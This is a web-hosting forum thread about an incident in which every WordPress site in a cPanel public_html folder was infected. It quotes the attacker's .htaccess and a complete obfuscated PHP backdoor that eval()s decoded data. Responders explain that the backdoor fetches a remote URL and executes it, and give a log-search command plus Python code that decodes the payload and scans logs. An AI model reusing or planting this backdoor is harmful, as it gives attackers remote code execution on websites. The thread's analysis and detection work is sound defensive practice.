Can a hacker have access to all the websites in public_html ?
Hi,
We had the unpleasant surprise of seeing that all of our websites present in the public_html directory contained malicious files.
We believe that these files were injected following a security vulnerability in one of our WordPress plugins.
Can you tell me whether, if a hacker manages to inject one of our sites, he can also have access to all the other site files present in public_html?
If so, is there a possibility of blocking this without needing to create a cPanel account for each website?
The hacker renamed all the .htaccess files on our sites to htaccess.th and added his own .htaccess file to all of our sites. It contained the following code:
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected|php7|php8|pHP7|PHP7|php58)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|credits.php|customize.php|edit-comments.php|edit-tags.php|edit.php|checkbox.php|export.php|input.php|link.php|load-scripts.php|load-styles.php|dropdown.php|menu.php|nav-menus.php|network.php|options-discussion.php|options-general.php|options-permalink.php|options-privacy.php|options-reading.php|options-writing.php|plugins.php|post-new.php|post.php|privacy.php|profile.php|site-health.php|term.php|text.php|themes.php|tools.php|update-core.php|user-edit.php|user-new.php|users.php|wp-links.php|wp-login.php|wp-signup.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
The hacker injected files everywhere on the sites, which always contained the same code, which is as follows:
Do you know what this malicious code is used for?
<?php
$co = chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$na = chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$ro = chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34);
$AmInE = "ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d";
$AmineDns = "JtZeE+Q/GlrDwQKjmF7KkqeNqco7xyA1m1Fd5vY4Usy2c8NdP33cX7X2g7nOfV76rWAnqE080WxyY+f/HpDfnyAojXTUyY7LtJy0N5Gtqq1q1cXOsWVu2lNLSXrZNXDbUfaHUdfw/25f0xn6Ej0oMJbQxh3eqBabYUJ35Lf5tSfpX4f28IhqcWhysKXEBLQIXzTMbVBmpjAGz6wQXET0WiUlC2qsTcDghVsOKxHYZuAk7ADk8C+gCMl7PC9uHb3PKh96m88SVENqonNW/YHJrC2Rq4wrfCiJY+UaAYFm0ug+o/cg1DTG1BZaGicImu1dNMoKm5LbNnVJz8WeAQLzs5OoGn5JsmueARSw9olAaFG/AMVBTDoHZuguIMVMk2p1KnBJZS/xKJXj0Y0xd2bndmJn8KASneH+IlbaqVQIAnDcTrBNWErUHUdppsQqCI4II1ktawUF8DBUC702QVFn45/nBAWA";/*2e3300cd40ea092e5eeb579abe01e85a*/
eval($co($ro($na($AmInE))));
exit;
?>
Based on what you posted, it sounds like you are hosting multiple sites via add-on domains. If that's the case, then they are all owned by the same cPanel user-id and if someone gets access to the account they have access to all the domains in that account.
If you truly want to isolate them, then they need to be separate accounts. Even at that level, it depends on how you configure PHP handlers (for example).
So we agree that to do this he did not need the username and password of the cPanel account, but that he went directly through a vulnerability in a plugin which gave him access to the public_html directory?
If you have a vulnerability where they can upload files, then yes, they have full access to basically every file under that user's home folder. They can upload a PHP script that can write/modify any file owned by that user. They can upload scripts that install their own file manager and then have GUI access to every file in that user's account, etc.
Thank you for your answer. OK, so we have cleaned all the sites and passed the update package.
On the other hand, I was unable to find out what the purpose of the malicious code I shared with you was. Do you have an idea?
I've just decoded it and, put simply, the code waits for a GET request to come in looking like: example.com/page.php?u=XXXXX&p=PASSWORD (where password is the reverse of the md5 hash 48FF3BDBAB87B3EE4D19F29C837D0AAC : I haven't been able to reverse that yet) and XXXXX is a base64 encoded URL which is then passed to curl to fetch. Once that page has been fetched, it is then executed/run.
I would search your Apache access logs for the strings "u=" and "p=" (each prefixed with a question mark, & symbol or ; as a separator) to see if you can find any references.
If you have SSH access to your account, you can do this via:
grep "[?&;]u=" ~/access-logs/ -r | grep "[?&;]p="
which will search the access logs for lines containing those parameters to see if the code has actually been used.
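The stage-1 decoding the answer above describes, as an added example that is not code from the thread: it resolves the three chr() chains and the PHP string escapes of the posted dropper as plain text (no PHP is executed) and then applies the base64_decode, urldecode, htmlspecialchars_decode chain that eval($co($ro($na($AmInE)))) builds, which exposes the stage-2 loader. The $AmineDns blob is left alone, since unpacking it needs the zlib steps that loader names.

```python
import base64
import html
import re
import urllib.parse

# The three chr() chains and the escaped string, copied verbatim from the
# dropper posted in this thread. They are handled as text only; no PHP runs.
CO = "chr(155-36-15).chr(87+29).chr(63+46).chr(76+13+19).chr(66-33+82).chr(74-36+74).chr(27+40+34).chr(105-8+2).chr(11+35+59).chr(99-3+1).chr(76+13+19).chr(105-8+2).chr(155-36-15).chr(99-3+1).chr(53+36+25).chr(66-33+82).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34)"
NA = "chr(59+39).chr(99-3+1).chr(66-33+82).chr(27+40+34).chr(26+28).chr(17+35).chr(23+72).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34)"
RO = "chr(4+97+16).chr(53+36+25).chr(76+13+19).chr(28+53+19).chr(27+40+34).chr(105-8+2).chr(54+22+35).chr(28+53+19).chr(27+40+34)"
AMINE = r"ZX\132hbCU\x79OCU\x79\116\x79U\x7a\122\x69U\x79\116\x6dd0\112\124\116C\112\124I3\114\x6dd6dW5jb21\x77c\x6d\126\x7ac\x79U\x79OGd6aW5\x6dbG\1060\132SU\x79OG\112hc2U2\116\1069\x6b\132W\116v\132GUlMjh\x7ad\110\112\x79\132XYlMj\x67lMj\122\102bWl\x75\132U\122\x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ\x67\x3d\x3d"

_CHR = re.compile(r"chr\(([0-9+\-]+)\)")
_ESC = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def php_chr_chain(expr: str) -> str:
    """Evaluate a chain of chr(a+b-c) terms without calling eval()."""
    return "".join(chr(sum(int(t) for t in re.findall(r"[+-]?\d+", arith)))
                   for arith in _CHR.findall(expr))


def php_unescape(s: str) -> str:
    """Resolve the \\xHH and \\OOO escapes PHP expands inside double quotes."""
    return _ESC.sub(lambda m: chr(int(m.group(1), 16)) if m.group(1)
                    else chr(int(m.group(2), 8)), s)


def decode_stage1(amine: str) -> str:
    """Mirror eval($co($ro($na($AmInE)))): base64_decode, then urldecode,
    then htmlspecialchars_decode, innermost call first."""
    raw = base64.b64decode(php_unescape(amine)).decode("ascii")
    return html.unescape(urllib.parse.unquote_plus(raw))


def resolve_dropper() -> dict:
    """Name the obfuscated functions and return the recovered stage-2 loader."""
    return {"co": php_chr_chain(CO), "ro": php_chr_chain(RO),
            "na": php_chr_chain(NA), "loader": decode_stage1(AMINE)}


if __name__ == "__main__":
    for name, value in resolve_dropper().items():
        print(f"{name}: {value}")
```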
Thank you for your answer.
I executed the command you gave me for my cPanel user but I don't have any results that resemble the example URL you gave me.
Are there any other checks I can do?
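The log check suggested in the earlier answer, run over sample lines as an added example that is not from the thread: it parses Apache combined-format entries, keeps only requests that carry both u= and p= (with ?, & or ; as the separator) and base64-decodes the u= value to show which URL the backdoor would have fetched. The two log lines and the example.invalid URL are constructed for this example.

```python
import base64
import binascii
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample lines in Apache combined format (not real traffic):
# one probe of the backdoor described above, one ordinary page view.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2023:04:12:09 +0000] "GET /wp-content/uploads/page.php?u=aHR0cDovL2V4YW1wbGUuaW52YWxpZC9zdGFnZS50eHQ=&p=REDACTED HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.3 - - [10/Mar/2023:04:13:44 +0000] "GET /about/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')
U_RE = re.compile(r"[?&;]u=([^&;\s]+)")   # same separators as the grep above
P_RE = re.compile(r"[?&;]p=")


def decode_u(value: str) -> Optional[str]:
    """Best-effort decode of the u= value: URL-decode, restore padding, base64."""
    raw = unquote(value)
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None   # not a base64 URL, so not the pattern the answer describes


def find_backdoor_hits(log_text: str) -> list:
    """Return one record per request that carries both u= and p= parameters."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        path = m.group("path")
        u = U_RE.search(path)
        if not u or not P_RE.search(path):
            continue
        hits.append({"client": line.split(" ", 1)[0],
                     "script": path.split("?", 1)[0],
                     "fetched_url": decode_u(u.group(1))})
    return hits


if __name__ == "__main__":
    for hit in find_backdoor_hits(SAMPLE_LOG):
        print(hit)
```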
It would not be unusual for the malicious code to be uploaded and then not used/accessed for days or weeks. The attacker is doing their best to stay under the radar.